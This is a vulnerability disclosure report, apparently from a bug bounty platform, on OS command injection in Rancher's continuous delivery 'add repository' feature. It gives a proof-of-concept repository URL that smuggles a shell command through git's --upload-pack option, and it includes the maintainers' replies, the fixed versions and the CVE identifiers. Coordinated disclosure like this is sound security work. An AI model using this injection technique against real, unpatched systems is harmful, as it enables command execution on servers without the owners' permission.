OS Command Injection in rancher/rancher


Reported on

Jun 1st 2022


A OS Command Injection in rancher continuous delivery panel, add repository function

Proof of Concept

first install a rancher in docker and login. Go to continuous delivery panel and click add repository button.
set repository url as --upload-pack=$(touch /tmp/poc), and click Create button we can see error information like then go to our pods, we found the poc file, proving that the command executed

docker exec -it 5ee8b011a2f7 /bin/sh
sh-4.4# kubectl exec -ti --namespace=cattle-fleet-system  gitjob-6b977748fc-gjzhl     -- sh
/ $ ls /tmp


execute command

We are processing your report and will contact the rancher team within 24 hours. 10 months ago
cokebeer modified the report
10 months ago
cokebeer modified the report
10 months ago
cokebeer modified the report
10 months ago
We have contacted a member of the rancher team and are waiting to hear back 10 months ago
rancher/rancher maintainer
10 months ago


Hi cokebeer.

Thank you for reporting this issue to us.

We will verify and review this internally to confirm the issue and then get back to you with an update.

If you have any questions in the meantime, please let us know. You can also use our GPG key to securely communicate with us - https://github.com/rancher/rancher/security/policy .

Thanks, Guilherme

We have sent a follow up to the rancher team. We will try again in 7 days. 10 months ago
rancher/rancher maintainer has acknowledged this report 10 months ago
rancher/rancher maintainer validated this vulnerability 10 months ago

Hi cokebeer (also CCing huntr.dev platform).

We acknowledge this issue and will work on a fix. We don't have a timeframe for the fix and which version of Rancher will ship it (we need to patch two branches - 2.6 and 2.5). We will share more details as soon as possible . We kindly ask to keep this information under embargo, since it's a security issue.

Right now the exposure is limited to only admin users in Rancher, which are already privileged users, so they can do anything in the Kubenetes clusters anyway. As we progress with the fix, we might adjust the severity and the CVSS score accordingly.

We also ask, please, to not request a CVE number, because we do this process internally when we are about to release the security advisory publicly.

If you have any questions, please let me know.

Thanks. Guilherme

cokebeer has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the rancher team. We will try again in 7 days. 9 months ago
We have sent a second fix follow up to the rancher team. We will try again in 10 days. 9 months ago
We have sent a third and final fix follow up to the rancher team. This report is now considered stale. 9 months ago
rancher/rancher maintainer
6 months ago


Hi. This is just an update to let you know that we are working privately to fix this issue. As soon as we have a timeline to release, I'll update here again. Thanks, Guilherme

rancher/rancher maintainer
2 months ago



I want to inform that this issue is now publicly fixed in the new Rancher versions:

  • v2.7.1 - https://github.com/rancher/rancher/releases/tag/v2.7.1
  • v2.6.10 - https://github.com/rancher/rancher/releases/tag/v2.6.10
  • v2.5.17 - https://github.com/rancher/rancher/releases/tag/v2.5.17

The reported issue was not in Rancher, but in Wrangler, a framework used in Rancher. So the issue was assigned CVE-2022-31249 and released in https://github.com/rancher/wrangler/security/advisories/GHSA-qrg7-hfx7-95c5 .

Additionally, we fixed the same issue in Rancher's own Git package (that was originally reported here) and assigned CVE-2022-43758 - https://github.com/rancher/rancher/security/advisories/GHSA-34p5-jp77-fcrc . This other CVE was also credited to you and to another reporter.

Please let me know if you need anything else.

Thanks, Guilherme

rancher/rancher maintainer gave praise 2 months ago
Thanks for reporting this issue. Please see the above comment.
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
rancher/rancher maintainer marked this as fixed in 2.7.1 with commit bb1c35 2 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on Jan 24th 2023
rancher/rancher maintainer published this vulnerability 2 months ago
to join this conversation